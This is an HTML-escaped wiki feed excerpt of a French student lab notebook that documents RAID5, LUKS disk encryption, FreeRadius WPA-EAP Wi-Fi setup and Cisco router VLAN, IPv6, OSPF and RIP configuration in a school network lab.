      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.5.5&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.5.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre routeur avec la connexion à la borne Wifi.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35827</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35827"/>
				<updated>2016-12-10T10:31:59Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Répartition du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
